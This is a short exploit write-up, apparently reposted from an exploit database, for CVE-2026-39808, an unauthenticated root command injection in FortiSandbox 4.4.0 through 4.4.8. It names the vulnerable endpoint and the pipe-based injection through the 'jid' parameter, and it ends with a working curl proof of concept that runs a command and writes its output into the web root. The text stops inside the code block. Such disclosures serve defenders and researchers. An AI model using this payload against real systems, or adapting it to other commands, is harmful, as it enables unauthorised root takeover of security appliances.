Share
## https://sploitus.com/exploit?id=PACKETSTORM:219020
# CVE-2026-39808
    
    On November 2025, a critical vulnerability was discovered on Fortinet's FortiSandbox which allowed an unauthenticated attacker to execute commands in the underlying OS as root. The vulnerability was patched and finally made public on April 2026.
    
    This vulnerability affects FortiSandbox versions 4.4.0 through 4.4.8. 
    
    Read the full advisory [here](https://www.fortiguard.com/psirt/FG-IR-26-100).
    
    ## The vulnerability
    The vulnerability affects the `/fortisandbox/job-detail/tracer-behavior` endpoint. OS commands can be injected using the pipe symbol (`|`) on the `jid` GET parameter.
    
    <img width="1919" height="747" alt="image008" src="https://github.com/user-attachments/assets/fe1a076e-e68e-4b10-a402-c888ed429d87" />
    
    In the example above, output was redirected to a file in the web root, so that it can be retrieved afterwards.
    
    <img width="729" height="172" alt="image" src="https://github.com/user-attachments/assets/01af5c52-8022-4c03-84bd-d879e9fcccb2" />
    
    ## PoC
    
    A simple curl command is enough to achieve RCE as root with no previous authentication:
    
    ```sh
    curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"